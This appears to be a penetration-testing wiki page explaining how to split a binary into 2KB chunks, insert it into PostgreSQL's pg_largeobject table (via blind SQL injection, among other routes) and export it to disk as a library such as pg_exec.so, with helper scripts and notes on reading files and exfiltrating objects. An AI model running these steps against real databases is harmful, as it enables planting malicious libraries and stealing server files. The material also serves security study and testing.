# Big Binary Files Upload (PostgreSQL)

## PostgreSQL Large Objects <a href="#postgresql-large-objects" id="postgresql-large-objects"></a>

PostgreSQL exposes a structure called a **large object** (stored in the `pg_largeobject` table), which is used for storing data that would be difficult to handle in its entirety, such as an image or a PDF document. As opposed to the `COPY TO` function, the advantage of **large objects** is that the **data** they **hold** can be **exported back** to the **file system** as an **identical copy of the original imported file**.

In order to **save a complete file inside this table** you first need to **create an object** in the mentioned table (identified by a **LOID**) and then **insert chunks of 2KB** into this object. It is very important that all the **chunks are exactly 2KB** (except possibly the last one) **or** the **export** function to the file system **won't work**.

In order to **split** your **binary** into **chunks** of **2KB** you can do:
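For example, with the standard `split` utility (demonstrated here on a dummy 5000-byte file; replace it with your real binary):

```shell
# create a dummy 5000-byte "binary" just for demonstration
head -c 5000 /dev/urandom > payload.bin

# split it into 2048-byte chunks named chunk_aa, chunk_ab, chunk_ac, ...
split -b 2048 payload.bin chunk_

ls -l chunk_*
```

With a 5000-byte input this produces two 2048-byte chunks and one final 904-byte chunk.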

In order to encode each of the chunk files to Base64 or hex you can use:

```
base64 -w 0 <Chunk_file>
xxd -ps -c 99999999999 <Chunk_file>
```

When exploiting this remember that you have to send **chunks of 2KB of clear-text bytes** (not 2KB of Base64- or hex-encoded bytes). If you try to automate this, note that the **hex-encoded** form of a file is **double** its size (so you need to send 4KB of encoded data for each chunk), and the **Base64-encoded** form of an `n`-byte chunk is `ceil(n / 3) * 4` bytes long.
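As a sanity check on those sizes, a small Python sketch (the 2KB chunk here is dummy data):

```python
import base64
import math

chunk = b"A" * 2048                         # one clear-text 2KB chunk (dummy data)

hex_len = len(chunk.hex())                  # hex encoding doubles the size
b64_len = len(base64.b64encode(chunk))      # Base64 is ceil(n / 3) * 4 bytes

print(hex_len)   # 4096
print(b64_len)   # 2732
```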

Also, while debugging the process you can inspect the contents of the large objects created with:

```
select loid, pageno, encode(data, 'escape') from pg_largeobject;
```

## Using lo\_creat & Base64 <a href="#using-lo_creat-and-base64" id="using-lo_creat-and-base64"></a>

First, we need to create a LOID where the binary data is going to be saved:

```
SELECT lo_creat(-1);       -- returns a new, randomly assigned LOID
SELECT lo_create(173454);  -- creates the large object with the given LOID
```

If you are abusing a **blind SQL injection** you will be more interested in using `lo_create` with a **fixed LOID**, so you **know where** you have to **upload** the **content**. Also note that this is not a typo: the functions really are named `lo_creat` and `lo_create`.

The LOID is used to identify the object in the `pg_largeobject` table. Inserting chunks of size 2KB into the `pg_largeobject` table can be achieved using:

```
INSERT INTO pg_largeobject (loid, pageno, data) values (173454, 0, decode('', 'base64'));
INSERT INTO pg_largeobject (loid, pageno, data) values (173454, 1, decode('', 'base64'));
INSERT INTO pg_largeobject (loid, pageno, data) values (173454, 2, decode('', 'base64'));
```
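If you are scripting the upload, the INSERT statements above can be generated from a local file; a minimal Python sketch (the function name `build_inserts` is hypothetical):

```python
import base64

def build_inserts(path, loid):
    """Return one INSERT per 2KB clear-text chunk of the file at `path`."""
    stmts = []
    with open(path, "rb") as f:
        pageno = 0
        while True:
            chunk = f.read(2048)          # read 2KB of clear-text bytes
            if not chunk:
                break
            b64 = base64.b64encode(chunk).decode()
            stmts.append(
                "INSERT INTO pg_largeobject (loid, pageno, data) "
                f"values ({loid}, {pageno}, decode('{b64}', 'base64'));"
            )
            pageno += 1
    return stmts
```

Each statement carries one page, so a 3000-byte file yields two statements (pages 0 and 1).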

Finally, you can export the file to the file system with (in this example the LOID used was `173454`):

```
SELECT lo_export(173454, '/tmp/pg_exec.so');
```

You may want to delete the large object after exporting it:

```
SELECT lo_unlink(173454);  
```

## Using lo\_import & Hex <a href="#using-lo_import-and-hex" id="using-lo_import-and-hex"></a>

In this scenario `lo_import` is going to be used to create a large object. Fortunately, in this case you can (optionally) specify the LOID you want to use:

```
select lo_import('C:\\Windows\\System32\\drivers\\etc\\hosts');
select lo_import('C:\\Windows\\System32\\drivers\\etc\\hosts', 173454);
```

After creating the object you can start inserting the data on each page (remember, you have to insert chunks of 2KB):

```
update pg_largeobject set data=decode('', 'hex') where loid=173454 and pageno=0;
update pg_largeobject set data=decode('', 'hex') where loid=173454 and pageno=1;
update pg_largeobject set data=decode('', 'hex') where loid=173454 and pageno=2;
update pg_largeobject set data=decode('', 'hex') where loid=173454 and pageno=3;
```

The hex must be just the hex digits (without any `0x` or `\x` prefix), for example:

```
update pg_largeobject set data=decode('68656c6c6f', 'hex') where loid=173454 and pageno=0;
```
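The same automation idea works for the hex variant; a Python sketch generating one UPDATE per 2KB clear-text chunk (the function name `build_updates` is hypothetical):

```python
def build_updates(path, loid):
    """Return one UPDATE per 2KB clear-text chunk, hex-encoded with no prefix."""
    stmts = []
    with open(path, "rb") as f:
        pageno = 0
        while True:
            chunk = f.read(2048)          # 2KB of clear-text bytes per page
            if not chunk:
                break
            stmts.append(
                f"update pg_largeobject set data=decode('{chunk.hex()}', 'hex') "
                f"where loid={loid} and pageno={pageno};"
            )
            pageno += 1
    return stmts
```

`bytes.hex()` already emits bare lowercase hex digits, matching the required format.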

Finally, export the data to a file and delete the large object:

```
select lo_export(173454, 'C:\\path\\to\\pg_extension.dll');
select lo_unlink(173454);
```

## Limitations <a href="#limitations" id="limitations"></a>

After reading the documentation of large objects in PostgreSQL, we can find out that **large objects can have ACLs** (Access Control Lists). It is possible to configure **new large objects** so that your user **doesn't have enough privileges** to read them, even if they were created by your user.

However, there may be an **old object with an ACL that allows the current user to read it**; in that case we can exfiltrate that object's content.
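To enumerate existing large objects together with their owners and ACLs, you could query the `pg_largeobject_metadata` catalog (available since PostgreSQL 9.0; a `NULL` ACL means the default owner-only privileges apply):

```
SELECT oid AS loid, lomowner::regrole AS owner, lomacl
FROM pg_largeobject_metadata;
```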

